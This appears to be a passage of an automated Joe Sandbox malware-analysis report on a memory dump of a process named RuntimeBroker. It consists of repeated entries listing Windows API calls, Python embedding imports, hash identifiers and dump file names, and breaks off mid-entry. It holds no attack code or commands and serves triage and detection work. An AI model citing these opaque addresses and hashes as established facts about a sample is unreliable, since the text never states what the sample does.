                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                • Instruction ID: 2a842859367c16081b218a64e9adb14f58672a61e5e86746a8b65955b8c079ef
                                                                                                                                                                                • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 5311BFA1B08A8181DA21AB29AC44179E361FB48BF4F980335EE7D077FACF3CD1508B40
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2050971199-0
                                                                                                                                                                                • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                • Instruction ID: 281bdd135021f22db46c3dbebf66492c632967ec5f0fb55460ac849649947edb
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                • Instruction Fuzzy Hash: 53E08650F0864242FF3A7BFA6C5407D9191EF9C740BC44038D90D47271EE2CA5454A30
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                • Instruction ID: 12270a8a75ca09993c8c8368b0e1ad6c6286b94bc4b5dc24b1707c41ed112153
                                                                                                                                                                                • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C41B972B0820247EA35AB1DA95227DB3A0EF5D781F940139DA9D476B1CF3CE503CB61
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                • Opcode ID: 770b6ab2df97d2559a6c10fc1b5dfeed8426fccf61b1cdbe3e1d7fcdeac4d843
                                                                                                                                                                                • Instruction ID: 77c8f901887c23e37d59c76d917a642e40c7612d2bb5bf4fdfcb01d6e1cc520e
                                                                                                                                                                                • Opcode Fuzzy Hash: 770b6ab2df97d2559a6c10fc1b5dfeed8426fccf61b1cdbe3e1d7fcdeac4d843
                                                                                                                                                                                • Instruction Fuzzy Hash: 84219321B0865546FA32BB1A6D443BAD645FF49BC4FC88430DE0C07BA6DE3DE041CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                • Instruction ID: 15a7f94d2434b57da418998f74f7be344362384a7cc11d0d0c793e61bd31752c
                                                                                                                                                                                • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                • Instruction Fuzzy Hash: 08317E21F1865286E773BB1E9C4137DA650EF58BA5F950139DA2D033F2DE7CA8818B30
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                • Instruction ID: 10796378ce4140bf13a9ac4e117c5cf7332a2d6c647b6b2057e01cf8758d3830
                                                                                                                                                                                • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                • Instruction Fuzzy Hash: 10219132B157058DEB26AF68D8442EC73A0FB48368F84463AD61C06AE5EF78E444CF64
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                • Instruction ID: 4fc0c5960fc2bc28e91f2ae739c4df15e835f4aa3d209fe586e70b95d2e2add0
                                                                                                                                                                                • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                • Instruction Fuzzy Hash: DB113021B1964641EA76BF59981027EE2A4EF5AB80F844439EB4C57AA6CE3CD5408B60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                • Instruction ID: 38d1c4e4a4bab0ee81f23f05f374cced832a0f36c7ed4e4d17e28152245e4a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E215672A18A4186DB729F1CE8403BDF660EB94B94F944234D65D476EADF3DD800DF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                • Instruction ID: 42c3af35cf93cdc92a3a1f1ecd281f13aa4051c7f03cfa7541adcb7727036003
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B01A521B0874641E925BB5A5D4006DE695FB59FE0F888635DE5C13BEADE3CE4028B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 93cc75e73fc731150685ac81897151a46a4fbf68a2222c5b0bedab5563f2a346
                                                                                                                                                                                • Instruction ID: f4c8b12168d1a1072e5696e60f7680a53d71fdd8bf2954667ba4f05d6b13e862
                                                                                                                                                                                • Opcode Fuzzy Hash: 93cc75e73fc731150685ac81897151a46a4fbf68a2222c5b0bedab5563f2a346
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A013930F1968341FEB6BF696D412799290EF497A4F98023CFE5C426E6DE2CB4404A21
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72B06A63A,?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A), ref: 00007FF72B06DEFD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                • Instruction ID: deaaa198a8064f2fd00b11cf8f549a3a9c26fb4ea2bc869ff8001a871efc65d3
                                                                                                                                                                                • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 92F04F50F0964781FE76776B5C612B5D290EF5CB40FC84138D90E862A2DD1CE4854A30
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,?,00007FF72B05FFB0,?,?,?,00007FF72B06161A,?,?,?,?,?,00007FF72B062E09), ref: 00007FF72B06C94A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                • Instruction ID: c3c0ce42795c7bc4807a1bd7a02b326b8fa82869ddcfb66acacd385049474d89
                                                                                                                                                                                • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CF05E00F1924745FF77777A5C59279D180DF4CB60FC842389D2E452E1DE1CE5418930
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                • Instruction ID: 3fd0cfbda46e0f783641dffedaf93fafc55f8bc4e6317469eda663d7bd670a72
                                                                                                                                                                                • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                • Instruction Fuzzy Hash: 17E0B6A0F4824642FA7A7FAC4E822799110EF6C340FC45078DE18062A7DD5C78489A32
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0550C0
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055101
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055126
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05514B
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055173
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05519B
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551C3
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551EB
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055213
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                • API String ID: 190572456-2007157414
                                                                                                                                                                                • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                • Instruction ID: 66a1498f64d863b07e96b0759cf09460149afc660524153ff3ede2eb42c74d45
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B124764A0AB4391FA77FB5CACA42B8E3A0FF04751BD45435C41E126B1EF7CE548AB60
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                                                                • Instruction ID: 4c6eb8f0ead000ee62e9b50f1e18363c9092519c2012df3866164e09182fbb9c
                                                                                                                                                                                • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                                                                • Instruction Fuzzy Hash: 01B2D172E182828BF7369F6CD8407FDE7A1FB54388F849135DA0957AA4DB38A901DF50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
